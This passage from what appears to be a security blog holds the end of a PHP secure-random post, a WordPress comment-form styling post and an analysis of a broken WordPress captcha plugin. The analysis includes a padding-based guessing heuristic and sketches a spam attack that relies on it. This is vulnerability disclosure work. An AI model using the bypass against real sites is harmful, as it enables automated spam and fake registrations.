<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">unpack</span><span class="w"> </span><span class="n">data</span><span class="w"> </span><span class="n">into</span><span class="w"> </span><span class="n">previously</span><span class="w"> </span><span class="n">determined</span><span class="w"> </span><span class="n">format</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">unpack</span><span class="p">(</span><span class="o">$</span><span class="n">format</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="s1">'*'</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">binary</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">False</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">ErrorException</span><span class="p">(</span><span class="s2">"unpack() failed."</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="n">Update</span><span class="w"> </span><span class="n">lookup</span><span class="o">-</span><span class="n">table</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">$</span><span class="n">data</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">last_lu</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">data</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">intval</span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">base</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">10</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="o">$</span><span class="nb">range</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">True</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">50</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Fall</span><span class="w"> </span><span class="n">back</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">numbers</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">recursive</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">exceed</span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">False</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="o">/*</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">couldn</span><span class="s1">'t locate an integer in the range, try again as long as we do not try more than 50 times. */</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="o">/*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$</span><span class="w"> </span><span class="n">Some</span><span class="w"> </span><span class="n">tests</span><span class="o">.</span><span class="w"> </span><span class="n">Ignore</span><span class="o">.</span><span class="w"> </span><span class="o">$</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</span><span class="w"></span>
<span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">test</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="o">$</span><span class="n">num_called</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">val</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="s2">"Random Value #$num_called is: "</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var_dump</span><span class="p">(</span><span class="o">$</span><span class="n">val</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="s2">"Generated securely: "</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="p">((</span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">True</span><span class="p">)</span><span class="w"> </span><span class="err">?</span><span class="w"> </span><span class="s2">"yes"</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s2">"no"</span><span class="p">)</span><span class="w"> </span><span class="o">.</span><span class="w"> </span><span class="s2">""</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">num_called</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">performance</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">My</span><span class="w"> </span><span class="n">approach</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">That</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">also</span><span class="w"> </span><span class="n">very</span><span class="w"> </span><span class="n">fast</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">20000</span><span class="p">)</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">i</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">200</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s2">"Elapsed time with secure_rand(): </span><span class="si">%.6f</span><span class="s2"> seconds"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">With</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">20000</span><span class="p">)</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">i</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">200</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s2">"Elapsed time with rand(): </span><span class="si">%.6f</span><span class="s2"> seconds"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">test</span><span class="p">(</span><span class="mi">100000000</span><span class="p">,</span><span class="w"> </span><span class="mi">100100000</span><span class="p">);</span><span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">Critical</span><span class="w"> </span><span class="n">call</span><span class="o">.</span><span class="w"> </span><span class="n">There</span><span class="s1">'s a high probability that the function will fail.</span>
<span class="n">test</span><span class="p">(</span><span class="mi">500</span><span class="p">,</span><span class="w"> </span><span class="mi">2000000</span><span class="p">);</span><span class="w"></span>
<span class="n">test</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">60</span><span class="p">);</span><span class="w"></span>
<span class="n">performance</span><span class="p">();</span><span class="w"></span>
</code></pre></div>
<p>It essentially requests 2^13 random bytes and then splits this blob
of data into bytes, shorts or longs, depending on the specified
range. It then iterates over these tokens and checks whether one of them
is a suitable candidate. If not, the function calls itself again (recursive step).
For further calls, all unused values are kept in a look-up table to
avoid making too many calls to the slow <code>openssl_random_pseudo_bytes()</code>
function. This increases performance a bit.</p>
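<p>To make the splitting step concrete, here is a minimal sketch of how one blob of random bytes can be reinterpreted as bytes, shorts or longs with <code>unpack()</code>. It assumes PHP 7 or later and uses <code>random_bytes()</code> as a stand-in for <code>openssl_random_pseudo_bytes()</code>; the variable names are illustrative and not taken from the function above.</p>
<div class="highlight"><pre><span></span><code>// Request 2^13 = 8192 random bytes in one go.
// Assumption: random_bytes() stands in for openssl_random_pseudo_bytes().
$blob = random_bytes(8192);

// Reinterpret the same blob with three unpack() formats:
// 'C' = unsigned char (1 byte), 'S' = unsigned short (2 bytes),
// 'L' = unsigned long (4 bytes). The '*' repeater consumes the whole blob.
$bytes  = unpack('C*', $blob);
$shorts = unpack('S*', $blob);
$longs  = unpack('L*', $blob);

// Prints: 8192 bytes, 4096 shorts, 2048 longs
printf("%d bytes, %d shorts, %d longs\n", count($bytes), count($shorts), count($longs));
</code></pre></div>
<p>The wider the format, the fewer candidates a single blob yields, which is one reason why large ranges are harder to satisfy than small ones.</p>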
<p>We try to find a random value in the requested range at most 50 times.
If the recursion depth reaches 50, we just return the result of the weak and
insecure <code>rand()</code>. You can check the boolean <code>$secure</code> parameter, which is passed by reference, to see
whether the value was found securely or whether we needed to fall back
to <code>rand()</code>.</p>
<p>There is no guarantee that the function will always find a value that
fits, especially in the ranges up to 2^32. If we search for a value in
the range (100000000, 100070000) for instance, we actually look for a
long value that is between 0 and 70000. There are at most <code>50*2^13/4</code>
long values in which we can search for such a value (because we request 8192/4
long values per function call and, all in all, we have at most 50
recursive calls).<br>
But the probability that a single random long value lies in this range
is roughly <code>1/(2^32/2^16) = 1/(2^16)</code>, which in turn means that
with our <code>50*2^13/4 = 102400</code> long values we expect about <code>(50*2^13/4)/2^16 ~= 1.6</code>
matching values, so we will probably, but not certainly, find one (the calculation is a rough estimate
though).</p>
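<p>The estimate can also be checked numerically. The following sketch computes the expected number of hits and the probability of at least one hit for the range (100000000, 100070000). It assumes PHP 7 or later and that all 50 calls draw 2048 independent, uniformly distributed 32-bit values; the variable names are illustrative.</p>
<div class="highlight"><pre><span></span><code>// 50 recursive calls, each yielding 8192/4 = 2048 long values.
$candidates = 50 * intdiv(8192, 4);

// A long value fits if it lies between 0 and 70000 (inclusive),
// so 70001 out of 2^32 possible values are acceptable.
$p_single = 70001 / pow(2, 32);

// Expected number of fitting values among all candidates.
$expected = $candidates * $p_single;

// Probability that at least one candidate fits.
$p_hit = 1 - pow(1 - $p_single, $candidates);

printf("candidates: %d\n", $candidates);
printf("expected hits: %.2f\n", $expected);
printf("probability of at least one hit: %.2f\n", $p_hit);
</code></pre></div>
<p>Under these assumptions, and using the exact range width rather than the 2^16 approximation, this comes out at roughly 1.7 expected hits and a success probability of about 80%. In other words, the fallback to <code>rand()</code> is a real possibility for such a narrow window inside a 32-bit range.</p>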
<p>The worst (rare) case that can happen: you end up using <code>rand()</code>. But as
mentioned, you can check for this (rare) case with the boolean <code>$secure</code>
parameter...</p>
<p>But in most cases you don't have these concerns and you are good to go!</p>
<p>To finish, here is a picture that illustrates the distribution of
secure_rand() output:</p>
<p>[Figure: distribution of secure_rand(), {static}/uploads/2013/11/out.png]<br>
The output of secure_rand() visualized as points in a canvas.</p>
Wordpress comment form with bootstrap v3.0.22013-11-08T10:36:00+01:002013-11-08T10:36:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-08:/2013/11/08/wordpress-comment-form-with-bootstrap-v3-0-2/<p>Hey everybody!</p>
<p>In this short article I will explain how I designed my wordpress theme's
comment section with bootstrap 3.0.2. For the most recent changes, you
can find my <a href="https://github.com/NikolaiT/clearcontent/">theme on github</a>. If
you want to see a live demo, just inspect the comment form on this site.
It uses exactly the bootstrap styled form I am discussing here.</p>
<p>In order to follow the contents of this blog post, you should have
basic experience with PHP and HTML/CSS.</p>
<h3>The Problem</h3>
<p>The tricky question here is whether we can use an action or filter hook
to manipulate the comment form to our liking, or whether we have to copy and
modify the original <code>comment_form()</code> function directly. Our goal is to
decorate the form with some bootstrap widget classes and use the
bootstrap grid layout. We want to obtain a horizontal form, such as the one
demonstrated <a href="http://getbootstrap.com/css/#forms-horizontal">here</a>.
After a quick search, I found the function <a href="http://codex.wordpress.org/Function_Reference/comment_form"><code>comment_form( $args,
$post_id);</code></a> in the
wordpress codex. While it looks promising at first glance, some
obstacles become clear after thinking it through. The function's
description says:</p>
<blockquote>
<p>Most strings and form fields may be controlled through the $args
array passed into the function, while you may also choose to use the
<code>comment_form_default_fields</code> filter to modify the array of default
fields if you'd just like to add a new one or remove a single field.
All fields are also individually passed through a filter of the form
<code>comment_form_field_$name</code> where <code>$name</code> is the key used in the array
of fields.</p>
<p><small>Wordpress codex at
<a href="http://codex.wordpress.org/Function_Reference/comment_form">http://codex.wordpress.org/Function_Reference/comment_form</a></small></p>
</blockquote>
<p>But there are two HTML elements in the function that aren't passed
through any filters/actions: the <code>&lt;form&gt;</code> element itself (with the
bootstrap comment form applied, the <code>&lt;form&gt;</code> element should be <code>&lt;form
class="form-horizontal" role="form"&gt;</code>) and the submit button, which needs
to be wrapped in the following div element:</p>
<div class="highlight"><pre><span></span><code><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"form-group"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</code></pre></div>
<p>Therefore we can't achieve the bootstrap horizontal comment form just by
passing a modified <code>$args</code> array to the <code>comment_form()</code> template tag.</p>
<h3>A Solution</h3>
<p>My quick &amp; dirty solution was to just copy the <code>comment_form()</code> code from
<a href="http://core.trac.wordpress.org/browser/tags/3.7.1/src/wp-includes/comment-template.php#L1509">comment-template.php</a>,
incorporate it into the theme (within functions.php for example) and then
modify it directly to my liking. I guess that doing so is
controversial, because there might be other ways to style the elements
that aren't affected by any filters. For instance, if we can't add
the bootstrap class "form-horizontal" to the <code>&lt;form&gt;</code> element, we
could alternatively just wrap the whole <code>comment_form()</code> output in a div
element of the same class (not tested whether it really works, though).</p>
<p>Anyways, my modified <code>comment_form</code> template can be found
<a href="https://github.com/NikolaiT/clearcontent/blob/master/inc/template-tags.php">here</a>
under the name <code>clearcontent_comment_form()</code>.</p>
<p>The solution is not really nice, because it violates a good wordpress
design pattern, namely avoiding duplicate code by using hooks. The
disadvantage is the potential inconsistency with the real
<code>comment_form()</code> code: whenever wordpress updates, I need to change my
custom <code>comment_form()</code> too in order to make sure that the interface
<code>comment_form()</code> provides stays stable. This is very inconvenient, to say
the least.</p>A tale of a twofold broken wordpress captcha plugin2013-11-04T02:02:00+01:002013-11-04T02:02:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-04:/2013/11/04/a-tale-of-a-twofold-broken-wordpress-captcha-plugin/<p><strong>Last Edit (Effective: 7th November 2013)</strong></p>
<p>It seems like the plugin authors updated the security of the plugin. The
whole original blog entry below deals with version 3.8.7. In this new section, I
will check whether the recent update to version
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/" title="3.8.8">3.8.8</a>
added the necessary security to prevent the following attacks:</p>
<ul>
<li>Attack vector one: Parsing the captcha logic.</li>
<li>Attack vector two: Reversing the decode() function and just reading the solution from the hidden fields.</li>
</ul>
<p>Let's get started:</p>
<p>At line 942 of the <a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/captcha.php" title="plugin code">plugin code</a>
(the start of the function that generates the captcha) we see that the
password is no longer a static clear text password. It is rebuilt
dynamically every 24 hours by the function <code>cptch_generate_key()</code>.
Here is the calling code for your convenience:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Functionality of the captcha logic work for custom form</span>
<span class="x">if ( ! function_exists( 'cptch_display_captcha_custom' ) ) {</span>
<span class="x"> function cptch_display_captcha_custom() {</span>
<span class="x"> global $cptch_options, $cptch_time;</span>
<span class="x"> if ( ! isset( $cptch_options['cptch_str_key'] ) )</span>
<span class="x"> $cptch_options = get_option( 'cptch_options' );</span>
<span class="x"> if ( $cptch_options['cptch_str_key']['key'] == '' || $cptch_options['cptch_str_key']['time'] < time() - ( 24 * 60 * 60 ) )</span>
<span class="x"> cptch_generate_key();</span>
<span class="x"> $str_key = $cptch_options['cptch_str_key']['key'];</span>
</code></pre></div>
<p>Let's see if the new function <code>cptch_generate_key()</code> is sufficiently
random. Here is the function code:</p>
<div class="highlight"><pre><span></span><code><span class="x">/* generate key */</span>
<span class="x">if ( ! function_exists( 'cptch_generate_key' ) ) {</span>
<span class="x"> function cptch_generate_key( $lenght = 15 ) {</span>
<span class="x"> global $cptch_options;</span>
<span class="x"> /* Under the string $simbols you write all the characters you want to be used to randomly generate the code. */</span>
<span class="x"> $simbols = get_bloginfo( "url" ) . time();</span>
<span class="x"> $simbols_lenght = strlen( $simbols );</span>
<span class="x"> $simbols_lenght--;</span>
<span class="x"> $str_key = NULL;</span>
<span class="x"> for ( $x = 1; $x <= $lenght; $x++ ) {</span>
<span class="x"> $position = rand( 0, $simbols_lenght );</span>
<span class="x"> $str_key .= substr( $simbols, $position, 1 );</span>
<span class="x"> }</span>
<span class="x"> $cptch_options['cptch_str_key']['key'] = md5( $str_key );</span>
<span class="x"> $cptch_options['cptch_str_key']['time'] = time();</span>
<span class="x"> update_option( 'cptch_options', $cptch_options );</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Sorry to disappoint, it's still <em>somewhat</em> broken. Let's discuss what
the patch does:</p>
<p>First the author obtains the current site address with
<code>get_bloginfo('url')</code>. The wordpress docs say that this retrieves:</p>
<blockquote>
<p>'url' - Returns the "Site address (URL)" set in Settings > General. This data is retrieved from the "home" record in the wp_options table. Equivalent to home_url().</p>
</blockquote>
<p>This is a publicly known, static value. There is no randomness in the
site URL in ANY POSSIBLE WAY! If the plugin is installed on my server,
<code>get_bloginfo('url')</code> would just yield "http://incolumitas.com/". You get
it? It returns the URL where wordpress is located :/</p>
<p>The function then appends the current timestamp, picks random characters from the
resulting string and concatenates them to a new string that has a default length
of 15. In short: the function just uses 15 random characters from the
seed, which is the site URL plus <code>time()</code>. Well, is this secure?</p>
<p>First of all, <code>rand()</code> is not a secure
<a href="http://en.wikipedia.org/wiki/Pseudorandom_number_generator">PRNG</a>! I
strongly suggest that the plugin author have a look at a recent reddit
netsec post explaining <a href="http://www.reddit.com/r/netsec/comments/1pvfmv/phps_mt_rand_random_number_generating_function/">that even <code>mt_rand()</code> is a weak
PRNG</a>.</p>
<p>This means that we can find out the state of <code>rand()</code> with
enough samples and can therefore predict which characters the <code>rand()</code>
function outputs. But maybe that does not work, because the password is only
generated every 24 hours and the "state" of the <code>rand()</code> PRNG changes
faster. I honestly don't know. That being said, there is probably
another way to extract values from <code>rand()</code> through wordpress in order to
obtain enough samples for a cracking attempt. Maybe even through the
captcha math equations themselves, since their randomness relies heavily
on successive calls to rand() [after thinking twice about it: that will
definitely work]. Anyway, I would suggest using something like the
following to generate the password (coded quickly by me, so better double check
it!):</p>
<div class="highlight"><pre><span></span><code><span class="x">// Always check if this function returns a str of length 64 (32 random bytes, hex-encoded)! If not, don't use it!</span>
<span class="x">if ( ! function_exists( 'cptch_generate_key' ) ) {</span>
<span class="x"> function cptch_generate_key( $length = 32 ) {</span>
<span class="x"> $cstrong = False;</span>
<span class="x"> $bytes = openssl_random_pseudo_bytes($length, $cstrong);</span>
<span class="x"> if ($cstrong == False)</span>
<span class="x"> return False;</span>
<span class="x"> else</span>
<span class="x"> return bin2hex($bytes);</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
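<p>For comparison, the same idea can be sketched in Python, the language of the cracking script further below. This is not part of the plugin; <code>generate_key</code> is a hypothetical helper name, and the only library call used is <code>secrets.token_hex()</code> from the standard library, which draws from the operating system's CSPRNG.</p>

```python
import secrets


def generate_key(num_bytes: int = 32) -> str:
    """Return num_bytes of OS-provided randomness as a hex string.

    Hypothetical counterpart to the PHP suggestion above: 32 random
    bytes become a 64 character hex string.
    """
    return secrets.token_hex(num_bytes)


key = generate_key()
print(len(key))
```

<p>The point is the same as in the PHP version: the key material comes from a cryptographically secure source and never from the site URL or <code>rand()</code>.</p>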
<p><strong>Conclusion:</strong></p>
<ul>
<li>The plugin is still vulnerable to captcha parsing (nothing
changed here). This is the root of the problem.</li>
<li>The plugin still handles its cryptography pretty badly, but the
randomness might be good enough! (Note that I am sometimes overly
meticulous where security is concerned.)</li>
<li>The whole captcha protection is even broken in a <em>third</em> way.
Consider some captchas that I generated with the plugin:<div class="highlight"><pre><span></span><code>Calculation with timestamp: 1383770422 Encoded pWw= is decoded to 3
Calculation with timestamp: 1383773265 Encoded 3Ko= is decoded to 8
Calculation with timestamp: 1383772504 Encoded tNM= is decoded to 6
Calculation with timestamp: 1383770071 Encoded E08r is decoded to 10
Calculation with timestamp: 1383771712 Encoded VEA= is decoded to 0
Calculation with timestamp: 1383770645 Encoded aWPB is decoded to 16
Calculation with timestamp: 1383773392 Encoded MEa7 is decoded to 42
Calculation with timestamp: 1383772030 Encoded 2uA= is decoded to 4
Calculation with timestamp: 1383770004 Encoded lJ8= is decoded to 7
Calculation with timestamp: 1383770859 Encoded KvE= is decoded to 9
Calculation with timestamp: 1383772789 Encoded k1I= is decoded to 7
Calculation with timestamp: 1383773377 Encoded BAE= is decoded to 6
Calculation with timestamp: 1383770038 Encoded /HY= is decoded to 8
Calculation with timestamp: 1383768565 Encoded nmM= is decoded to 5
Calculation with timestamp: 1383765035 Encoded JPA= is decoded to 6
Calculation with timestamp: 1383770354 Encoded 9EZ3 is decoded to 12
Calculation with timestamp: 1383771119 Encoded KX4= is decoded to 1
Calculation with timestamp: 1383773236 Encoded eSc= is decoded to 7
Calculation with timestamp: 1383770716 Encoded J6w= is decoded to 1
Calculation with timestamp: 1383768040 Encoded fUg= is decoded to 1
Calculation with timestamp: 1383773167 Encoded 7Co= is decoded to 6
Calculation with timestamp: 1383770803 Encoded A3k= is decoded to 1
Calculation with timestamp: 1383771047 Encoded J1Q= is decoded to 8
Calculation with timestamp: 1383768079 Encoded fpg= is decoded to 6
Calculation with timestamp: 1383767787 Encoded uR8= is decoded to 2
Calculation with timestamp: 1383773077 Encoded pgg= is decoded to 4
Calculation with timestamp: 1383772657 Encoded KXI= is decoded to 3
Calculation with timestamp: 1383771187 Encoded Ct0= is decoded to 9
Calculation with timestamp: 1383767982 Encoded Y6U= is decoded to 3
Calculation with timestamp: 1383773155 Encoded 9wpu is decoded to 11
Calculation with timestamp: 1383767071 Encoded ejeX is decoded to 27
Calculation with timestamp: 1383772116 Encoded dWyu is decoded to 15
</code></pre></div>
</li>
</ul>
<p>What do you see? Numeric captcha solutions smaller than 10 have an
encoded value (the base64 encoded 3-4 char string) that ends with
the equal sign "=". Hence we could just sketch a little script that
checks whether the hidden field <code>cptch_result</code> ends with a "=". If
this is the case, we just guess the result! That means we can inject
a spam comment/login attempt/registration in every 10th case (a
little less effectively, since we have to discard numbers of 10 and above; but
there we could also guess a number, just a higher one, as there is only a
finite pool of them). Assuming that we fire 500 requests a minute,
we can spam the blog with 50 new users or 50 spam comments a minute!
That's not bad for such a simplistic approach :P<br>
This technique is based, yet again, on the bad encode() function.</p>
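<p>The padding check described above could look roughly like the following sketch. The sample values are copied from the list of generated captchas; the helper name <code>looks_single_digit</code> is made up for illustration, and the plugin's own encode() function is not reproduced here.</p>

```python
import base64

# A few (encoded value, decoded solution) pairs copied from the list above.
samples = [
    ("pWw=", 3),
    ("3Ko=", 8),
    ("VEA=", 0),
    ("E08r", 10),
    ("aWPB", 16),
    ("MEa7", 42),
]


def looks_single_digit(encoded: str) -> bool:
    """Heuristic from the text: base64 padding reveals a one-digit solution."""
    return encoded.endswith("=")


for encoded, solution in samples:
    raw = base64.b64decode(encoded)
    # Padded values decode to 2 bytes, unpadded ones to 3 bytes.
    print(encoded, len(raw), looks_single_digit(encoded), solution)
```

<p>A spam script would only need this check on the hidden <code>cptch_result</code> field and could then submit a guess between 0 and 9 whenever it returns true.</p>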
<h3>Excursus: Could we crack the new function?</h3>
<p>Let's assume that <code>get_bloginfo( "url" ).time();</code> yields something like</p>
<div class="highlight"><pre><span></span><code>http://site.us1383733573
</code></pre></div>
<p>Then the pool of random characters is (Every character only once!)</p>
<div class="highlight"><pre><span></span><code>htp:/sie.u13875
</code></pre></div>
<p>and the number of occurrences of every char is:</p>
<div class="highlight"><pre><span></span><code>'h': 1
't': 3
'p': 1
':': 1
'/': 2
's': 2
'i': 1
'e': 1
'.': 1
'u': 1
'1': 1
'3': 5
'8': 1
'7': 2
'5': 1
</code></pre></div>
<p>And of course we all know our maths: the number of combinations is n^k,
where n is the number of different input characters (the alphabet) and k
is the length of the password.</p>
<p>Hence, in the worst case, we need to try</p>
<div class="highlight"><pre><span></span><code>n = 15;
k = 15;
number_of_combinations = 15^15
Python:
>>> 15**15
437893890380859375
</code></pre></div>
<p>437893890380859375 is quite a big number. Assuming we have a slow PC and
use <a href="http://hashcat.net/oclhashcat-plus/">hashcat</a>, we can handle 335M
c/s. This means we need 1307145941 seconds (roughly 41 years) to brute force the password.
Of course this "cryptanalysis" applies only to a somewhat artificial
site URL like <em>http://site.us</em>. Nevertheless, this is not secure in terms
of cryptography!</p>
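<p>The figures of this excursus can be recomputed with a short Python sketch. The seed string and the hash rate are the example values from the text, not measurements; the variable names are chosen for illustration only.</p>

```python
from collections import Counter

# Example inputs taken from the text (hypothetical site URL and timestamp).
seed = "http://site.us" + "1383733573"   # get_bloginfo("url") . time()
key_length = 15                           # default length in cptch_generate_key()
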